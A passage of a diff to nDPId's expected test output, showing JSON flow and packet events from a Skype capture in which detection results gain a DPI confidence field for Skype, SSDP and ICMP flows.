-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1431970683987,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970683987,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Ni4AAEARsXfAqAEinTg0ETLdnE0AIDQfe8MCmFcjIzVltOuGOdvvgZmibnosxcEh"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1248,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1248,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1431970683987,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970683987,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PqwAAEARIpXAqAEiQAQXqjLdnEsAIM3ke8UC93ejJq9SbNcOBlZBFwBC35pf1nt9"}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":3,"flow_last_seen":1431970684268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970684268,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+Rv3UowwKgBIpxIyE81se9IYPNDQ6ASOJCdPQAAAgQFrAQCCApNifogPjJCqwEDAwk="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1260,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJbZAAEAGym3AqAEinTfrkshQAbtIMwlhAAAAALAC\/\/9JqAAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"}
@@ -765,26 +765,26 @@
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":3,"flow_last_seen":1431970684880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431970684880,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo55hAAEAG11\/AqAEib91KMMhTAbtJAhNsAAAAAFAEAAANjAAA"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1431970684997,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431970684997,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyBX4AAEARk57AqAEinTeCnTLdnE0AHhvPe8cCM2e01AKVV7JkJRCi7OoE7P+SqQ=="}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1287,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1287,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1431970684997,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970684997,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8MWwAAEARL9zAqAEiQAQXmzLdnEQAKCm\/e8kCIw7UNc1vAeAYbNVJreKXHNKN8e8UIdCt8moAbvU="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1287,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1287,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1288,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1288,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1431970684997,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431970684997,"pkt":"0NQSxnP1PBXCt3IOCABFAABBr7UAAEARf9fAqAEi1cezjTLdnE8ALaWJe8sCd26eaxqppENRG4WXSuPXFKjQruFJphoXGEqS7tX7w9Yk1Q=="}
-00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1288,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1288,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1316,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":59237,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1431970685835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1431970685835,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChckEAAAERlUbAqAEi7\/\/\/+udlB2wAjUvnTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1316,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":59237,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1316,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":59237,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":1431970685835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1431970685835,"pkt":"AQBef\/\/6PBXCt3IOCABFAACgeC8AAAERj1nAqAEi7\/\/\/+udlB2wAjLHaTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1318,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1431970685835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1431970685835,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChI3QAAAER5BPAqAEi7\/\/\/+uLNB2wAjVB\/TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1318,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1318,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":2,"flow_last_seen":1431970685835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1431970685835,"pkt":"AQBef\/\/6PBXCt3IOCABFAACgWWQAAAERriTAqAEi7\/\/\/+uLNB2wAjLZyTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1320,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59052,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1320,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1431970685835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431970685835,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo7Q4AAEARCkPAqAEiwKgBAeasFOcAFAzzAAEAADLdMt0AAA4Q"}
 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685839,"flow_last_seen":1431970685839,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431970685839,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1431970685839,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1431970685839,"pkt":"PBXCt3IO0NQSxnP1CABFwABElr0AAEABX8jAqAEBwKgBIgMDgJYAAAAARQAAKO0OAABAEQpDwKgBIsCoAQHmrBTnABQM8wABAAAy3TLdAAAOEA=="}
-00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685839,"flow_last_seen":1431970685839,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431970685839,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.991447}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685839,"flow_last_seen":1431970685839,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431970685839,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.991447}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1323,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685852,"flow_last_seen":1431970685852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970685852,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1323,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1431970685852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970685852,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXIlAAEAG5ijAqAEiW77afchUMD4lFgKCAAAAALAC\/\/+SwgAAAgQFtAEDAwUBAQgKPjJN1wAAAAAEAgAA"}
